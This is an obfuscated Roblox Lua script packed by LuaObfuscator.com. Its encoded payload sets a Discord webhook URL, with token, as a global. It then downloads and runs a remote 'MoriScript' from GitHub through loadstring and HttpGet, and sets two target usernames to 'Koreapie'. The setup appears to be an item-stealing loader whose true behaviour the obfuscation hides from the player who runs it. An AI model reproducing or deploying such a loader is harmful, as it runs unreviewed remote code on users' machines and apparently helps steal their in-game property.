--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.9) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v72=0 -0 ;local v73;while true do if (v72==((0 + 0) -0)) then v73=(v31/((3 -1)^(v32-(2 -1))))%((621 -(555 + 64))^(((v33-1) -(v32-1)) + (932 -(857 + 74)))) ;return v73-(v73%((810 -241) -(367 + 201))) ;end end else local v74=927 -((1279 -(68 + 997)) + 713) ;local v75;while true do if (v74==(0 + 0)) then v75=2^(v32-(1 + 0)) ;return (((v31%(v75 + v75))>=v75) and ((2148 -(226 + 1044)) -(282 + 595))) or (1637 -((6631 -5108) + 114)) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (120 -(32 + 85)) );v19=v19 + (9 -5) + 0 ;return (v37 * 16777216) + (v36 * (14533 + 51003)) + (v35 * (1213 -(892 + 65))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=114 -(4 + 110) ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v38==0) then v39=584 -(57 + 527) ;v40=nil;v38=2 -1 ;end if ((2 + 0)==v38) then v43=nil;v44=nil;v38=3;end if (v38==1) then v41=nil;v42=nil;v38=2;end if (v38==3) then v45=nil;v46=nil;v38=1431 -(41 + 1386) ;end if (v38~=4) then else while true do if (v39==(1 + 0)) then v42=nil;v43=nil;v39=3 -1 ;end if (v39~=2) then else v44=nil;v45=nil;v39=1265 -(1091 + 171) ;end if (v39~=(3 + 0)) then else v46=nil;while true do local v100=0;local v101;local v102;while true do if (v100==(0 -0)) then v101=0;v102=nil;v100=2 -1 ;end if (v100~=(1 + 0)) then else while true do if (v101==(0 -0)) then v102=0;while true do if (v102~=0) then else if (v40~=1) then else local v178=0;local v179;local v180;while true do if (v178~=(0 -0)) then else v179=374 -(123 + 251) ;v180=nil;v178=167 -(122 + 44) ;end if (v178==1) then while true do if (v179==(0 -0)) then v180=698 -(208 + 490) ;while true do if (v180==0) then v45=v24();v46={};v180=1;end if (v180~=(1 + 1)) then else v40=2;break;end if (1~=v180) then else local v188=0 + 0 ;while true do if (v188~=(837 -(660 + 176))) then else v180=1 + 1 ;break;end if (v188~=(202 -(14 + 188))) then else for v193=1,v45 do local v194=675 -(534 + 141) ;local v195;local v196;local v197;local v198;local v199;while true do if (v194==1) then v197=nil;v198=nil;v194=2 + 0 ;end if (v194==(1 + 1)) then v199=nil;while true do if (v195~=2) then else while true do if (v196~=0) then else local v209=1257 -(1043 + 214) ;while true do if (v209==(0 -0)) then v197=1212 -(323 + 889) ;v198=nil;v209=1 + 0 ;end if (v209~=(2 -1)) then else v196=1;break;end end end if (v196==1) then v199=nil;while true do if (v197~=(1 + 0)) then else if (v198==(581 -(361 + 219))) then v199=v22()~=0 ;elseif (v198==(3 -1)) then v199=v25();elseif (v198~=(323 -(53 + 267))) then else v199=v26();end v46[v193]=v199;break;end if (v197~=(0 -0)) then else local v212=413 -(15 + 398) ;local v213;while true do if ((0 -0)==v212) then v213=0 + 0 ;while true do if (1==v213) then v197=1;break;end if (v213~=(0 + 0)) then else v198=v22();v199=nil;v213=397 -(115 + 281) ;end end break;end end end end break;end end break;end if (v195~=(0 + 0)) then else local v208=0;while true do if (v208~=0) then else v196=0 -0 ;v197=nil;v208=1 + 0 ;end if (v208==(2 -1)) then v195=1;break;end end end if (v195==(3 -2)) then v198=nil;v199=nil;v195=869 -(550 + 317) ;end end break;end if ((0 -0)==v194) then v195=0;v196=nil;v194=1 -0 ;end end end v44[741 -(542 + 196) ]=v22();v188=2 -1 ;end end end end break;end end break;end end end if (v40==(0 -0)) then local v181=285 -(134 + 151) ;local v182;while true do if (v181==(1665 -(970 + 695))) then v182=0;while true do if (v182==(0 + 0)) then local v186=0 -0 ;while true do if (v186~=(0 -0)) then else local v189=1990 -(582 + 1408) ;while true do if (v189~=(3 -2)) then else v186=1 -0 ;break;end if (v189==(0 -0)) then v41={};v42={};v189=1825 -(1195 + 629) ;end end end if (v186~=(1 -0)) then else v182=242 -(187 + 54) ;break;end end end if ((7 -5)~=v182) then else v40=781 -(162 + 618) ;break;end if ((1122 -(118 + 1003))~=v182) then else local v187=0 + 0 ;while true do if (v187==(2 -1)) then v182=379 -(142 + 235) ;break;end if (v187~=(0 + 0)) then else local v190=0 -0 ;while true do if (0==v190) then v43={};v44={v41,v42,nil,v43};v190=1001 -(451 + 549) ;end if (v190~=(1 + 0)) then else v187=1 -0 ;break;end end end end end end break;end end end v102=1 -0 ;end if (v102~=(1385 -(746 + 638))) then else if (v40==(1 + 1)) then local v183=0 -0 ;while true do local v184=0 + 0 ;local v185;while true do if (v184==(341 -(218 + 123))) then v185=1581 -(1535 + 46) ;while true do if (v185~=(0 + 0)) then else if (v183~=(0 + 0)) then else local v191=0;while true do if (v191==(1 + 0)) then v183=1;break;end if (v191~=(560 -(306 + 254))) then else for v200=1 + 0 ,v24() do local v201=0;local v202;local v203;local v204;local v205;while true do if (v201==0) then v202=0 -0 ;v203=nil;v201=1468 -(899 + 568) ;end if (v201==2) then while true do if (v202~=(4 -3)) then else v205=nil;while true do if (v203~=(754 -(239 + 514))) then else while true do if (v204==0) then v205=v22();if (v21(v205,1,1 + 0 )==(1329 -(797 + 532))) then local v214=0 -0 ;local v215;local v216;local v217;local v218;while true do if (v214==0) then v215=0 + 0 ;v216=nil;v214=2 -1 ;end if (v214~=(604 -(268 + 335))) then else v217=nil;v218=nil;v214=292 -(60 + 230) ;end if (v214==(733 -(476 + 255))) then while true do if (v215==(572 -(426 + 146))) then v216=v21(v205,2 + 0 ,1 + 2 );v217=v21(v205,7 -3 ,1462 -(282 + 1174) );v215=812 -(569 + 242) ;end if (3==v215) then if (v21(v217,3,8 -5 )~=(1 + 0)) then else v218[1028 -(706 + 318) ]=v46[v218[4]];end v41[v200]=v218;break;end if (v215~=2) then else local v220=1251 -(721 + 530) ;while true do if (v220==1) then v215=3;break;end if (v220~=(1271 -(945 + 326))) then else if (v21(v217,2 -1 ,1 + 0 )==1) then v218[2]=v46[v218[2]];end if (v21(v217,1 + 1 ,2 + 0 )~=(701 -(271 + 429))) then else v218[8 -5 ]=v46[v218[3]];end v220=1;end end end if (v215~=(1 + 0)) then else v218={v23(),v23(),nil,nil};if (v216==(1288 -(993 + 295))) then local v223=0;local v224;while true do if (v223~=0) then else v224=0 + 0 ;while true do if (v224~=0) then else v218[1174 -(418 + 753) ]=v23();v218[4]=v23();break;end end break;end end elseif (v216==1) then v218[3]=v24();elseif (v216==(1 + 1)) then v218[2 + 1 ]=v24() -((1 + 1)^(1949 -(565 + 1368))) ;elseif (v216==3) then local v233=0 + 0 ;while true do if (v233~=(1661 -(1477 + 184))) then else v218[3]=v24() -((1 + 1)^(545 -(406 + 123))) ;v218[1773 -(1749 + 20) ]=v23();break;end end end v215=2 + 0 ;end end break;end end end break;end end break;end if (v203==(0 + 0)) then local v210=0;while true do if (v210~=(0 -0)) then else v204=0;v205=nil;v210=1323 -(1249 + 73) ;end if (v210~=(1 + 0)) then else v203=1146 -(466 + 679) ;break;end end end end break;end if (v202~=0) then else v203=0 -0 ;v204=nil;v202=1 + 0 ;end end break;end if (v201==(2 -1)) then v204=nil;v205=nil;v201=1902 -(106 + 1794) ;end end end for v206=1,v24() do v42[v206-(1 + 0) ]=v29();end v191=1;end end end if (v183==1) then return v44;end break;end end break;end end end end break;end end break;end end break;end end end break;end if (v39~=(0 + 0)) then else local v99=0;while true do if (v99~=(1 + 0)) then else v39=1 + 0 ;break;end if (v99~=(0 -0)) then else v40=0;v41=nil;v99=2 -1 ;end end end end break;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=0;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (((3337 -1722) -(1565 + 48))==v47) then v52=v21(v49,13 + 8 ,1169 -(782 + (1057 -701)) );v53=((v21(v49,(97 + 202) -(176 + 91) )==((1207 -(902 + 303)) -1)) and  -((1 -0) -0)) or (1093 -(975 + 117)) ;v47=3;end if (v47==(1878 -((378 -221) + 1718))) then if (v52==(0 + 0)) then if (v51==0) then return v53 * (0 -0) ;else v52=3 -2 ;v50=(2916 -(260 + 1638)) -((1137 -(382 + 58)) + 321) ;end elseif (v52==(5576 -(304 + 3225))) then return ((v51==0) and (v53 * ((1 -0)/(0 -0)))) or (v53 * NaN) ;end return v8(v53,v52-(399 + 624) ) * (v50 + (v51/((3 -(3 -2))^(44 + 8)))) ;end if (v47==((1690 -(1121 + 569)) -0)) then v48=v24();v49=v24();v47=1228 -(322 + 905) ;end if (v47==(612 -(602 + 9))) then v50=1190 -(449 + 740) ;v51=(v21(v49,1,892 -(826 + 46) ) * ((216 -(22 + 192))^(979 -(245 + 702)))) + v48 ;v47=6 -4 ;end end end v26=nil;function v26(v54)local v55;if  not v54 then local v76=0;while true do if (v76==(683 -(483 + 200))) then v54=v24();if (v54==(1463 -(1404 + 59))) then return "";end break;end end end v55=v3(v16,v19,(v19 + v54) -((767 -(468 + 297)) -1) );v19=v19 + v54 ;local v56={};for v70=1 -0 , #v55 do v56[v70]=v2(v1(v3(v55,v70,v70)));end return v6(v56);end v18=5;end if (v18==2) then function v22()local v57=(160 + 402) -((570 -(141 + 95)) + 228) ;local v58;while true do if (v57==1) then return v58;end if (v57==(0 -0)) then v58=v1(v16,v19,v19);v19=v19 + (2 -1) ;v57=1 -0 ;end end end v23=nil;function v23()local v59=0 + 0 ;local v60;local v61;while true do if (v59==(2 -(1 -0))) then return (v61 * (615 -359)) + v60 ;end if ((0 + 0)==v59) then v60,v61=v1(v16,v19,v19 + (5 -(2 + 1)) );v19=v19 + 2 + 0 ;v59=1 + 0 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v62)if (v1(v62,2)==79) then v20=v0(v3(v62,1,1));return "";else local v77=v2(v0(v62,16));if v20 then local v81=v5(v77,v20);v20=nil;return v81;else return v77;end end end);v18=1;end if (v18==7) then function v30(v63,v64,v65)local v66=0;local v67;local v68;local v69;while true do if (v66==0) then v67=v63[1];v68=v63[2];v66=1;end if (v66==1) then v69=v63[3];return function(...)local v82=v67;local v83=v68;local v84=v69;local v85=v28;local v86=1;local v87= -1;local v88={};local v89={...};local v90=v12("#",...) -1 ;local v91={};local v92={};for v96=0,v90 do if (v96>=v84) then v88[v96-v84 ]=v89[v96 + 1 ];else v92[v96]=v89[v96 + 1 ];end end local v93=(v90-v84) + 1 ;local v94;local v95;while true do v94=v82[v86];v95=v94[1];if (v95<=5) then if (v95<=2) then if (v95<=0) then v92[v94[2]]();elseif (v95>1) then if (v92[v94[2]]==v94[4]) then v86=v86 + 1 ;else v86=v94[3];end else v92[v94[2]][v94[3]]=v94[4];end elseif (v95<=3) then local v107=v94[2];v92[v107]=v92[v107](v13(v92,v107 + 1 ,v87));elseif (v95>4) then local v113=0;local v114;local v115;local v116;local v117;while true do if (v113==1) then v87=(v116 + v114) -1 ;v117=0;v113=2;end if (0==v113) then v114=v94[2];v115,v116=v85(v92[v114](v13(v92,v114 + 1 ,v94[3])));v113=1;end if (v113==2) then for v172=v114,v87 do v117=v117 + 1 ;v92[v172]=v115[v117];end break;end end else local v118=0;local v119;local v120;local v121;local v122;local v123;while true do if (3==v118) then v92[v123 + 1 ]=v122;v92[v123]=v122[v94[4]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v94[3];v118=4;end if (v118==0) then v119=nil;v120,v121=nil;v122=nil;v123=nil;v92[v94[2]][v94[3]]=v94[4];v118=1;end if (6==v118) then v86=v86 + 1 ;v94=v82[v86];v123=v94[2];v92[v123]=v92[v123](v13(v92,v123 + 1 ,v87));v86=v86 + 1 ;v118=7;end if (v118==1) then v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v65[v94[3]];v86=v86 + 1 ;v94=v82[v86];v118=2;end if (2==v118) then v92[v94[2]]=v65[v94[3]];v86=v86 + 1 ;v94=v82[v86];v123=v94[2];v122=v92[v94[3]];v118=3;end if (v118==5) then v123=v94[2];v120,v121=v85(v92[v123](v13(v92,v123 + 1 ,v94[3])));v87=(v121 + v123) -1 ;v119=0;for v175=v123,v87 do v119=v119 + 1 ;v92[v175]=v120[v119];end v118=6;end if (v118==4) then v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v94[3]~=0 ;v86=v86 + 1 ;v94=v82[v86];v118=5;end if (v118==7) then v94=v82[v86];v92[v94[2]]();v86=v86 + 1 ;v94=v82[v86];v86=v94[3];break;end end end elseif (v95<=8) then if (v95<=6) then v92[v94[2]]=v94[3];elseif (v95==7) then v92[v94[2]]=v94[3]~=0 ;else local v125=v94[2];local v126=v92[v94[3]];v92[v125 + 1 ]=v126;v92[v125]=v126[v94[4]];end elseif (v95<=10) then if (v95>9) then v92[v94[2]]=v65[v94[3]];else v86=v94[3];end elseif (v95==11) then local v133=0;while true do if (v133==0) then v92[v94[2]][v94[3]]=v94[4];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v65[v94[3]];v133=1;end if (v133==2) then v94=v82[v86];v92[v94[2]]=v94[3];v86=v86 + 1 ;v94=v82[v86];v133=3;end if (v133==3) then v86=v94[3];break;end if (v133==1) then v86=v86 + 1 ;v94=v82[v86];v92[v94[2]][v94[3]]=v94[4];v86=v86 + 1 ;v133=2;end end else do return;end end v86=v86 + 1 ;end end;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31323437343832382O363038322O373531342F4161795051314750626D7632794D2D312O704C63655936756F527776523767335F6A554F626337566658525536673655374D56396549547630426F53672D6D584641514D030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D6503073O004B6F726570696503093O00557365724E616D653200173O0012063O00013O0026023O000E000100020004093O000E000100120A000100033O00300400010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000500016O000200056O00013O00024O00010001000100044O001600010026023O0001000100010004093O0001000100120A000100033O00300B0001000A000B00122O000100033O00302O0001000C000B00124O00023O00044O000100012O000C3O00017O00",v9(),...);end
